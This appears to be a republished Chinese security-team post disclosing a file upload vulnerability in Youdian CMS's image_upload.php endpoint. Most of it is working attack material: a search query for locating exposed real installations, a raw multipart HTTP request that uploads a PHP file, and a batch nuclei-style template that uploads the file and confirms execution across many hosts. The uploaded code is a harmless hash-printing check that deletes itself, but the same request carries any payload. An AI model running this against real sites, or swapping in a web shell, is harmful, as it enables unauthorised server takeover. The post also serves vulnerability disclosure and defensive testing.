漏洞简介
友点CMS是一款高效且灵活的网站管理系统,它为用户提供了简单易用的界面和丰富的功能。友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,恶意攻击者可能会利用此漏洞上传恶意文件,从而获取服务器权限。
漏洞复现
步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~
# 搜索语法app="友点建站-CMS"
步骤二:以下为POC数据包上传PHP代码文件后获取上传地址...
POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1Host: 127.0.0.1Content-Type: multipart/form-data;boundary=----WebKitFormBoundarydAPjrmyKewWuf59HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0------WebKitFormBoundarydAPjrmyKewWuf59HContent-Disposition: form-data; name="files"; filename="ceshi.php"Content-Type: image/jpgecho md5('666');unlink(__FILE__);------WebKitFormBoundarydAPjrmyKewWuf59H--
步骤三:拼接并在浏览器中访问上传地址后....获得666的MD5加密值内容...
批量脚本
id: Youdian-CMS-uploadfileinfo:name: 友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,恶意攻击者可能会利用此漏洞上传恶意文件,从而获取服务器权限。: LYseverity: highmetadata:: app="友点建站-CMS"variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"http:raw:|POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1Host: {{Hostname}}: multipart/form-data;boundary=----WebKitFormBoundarydAPjrmyKewWuf59H: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36: 0------WebKitFormBoundarydAPjrmyKewWuf59H: form-data; name="files"; filename="{{filename}}.php": image/jpgecho md5('666');unlink(__FILE__);?>------WebKitFormBoundarydAPjrmyKewWuf59H--|GET /Public/image/uploads/{{path}}.php HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0extractors:type: regexname: pathgroup: 1regex:'image/uploads/(w*).php'internal: truematchers:type: dsldsl:status_code==200 && contains_all(body,"fae0b27c451c728867a567e8c1bb4e53")
原文始发于微信公众号(揽月安全团队):友点CMS image_upload.php 文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论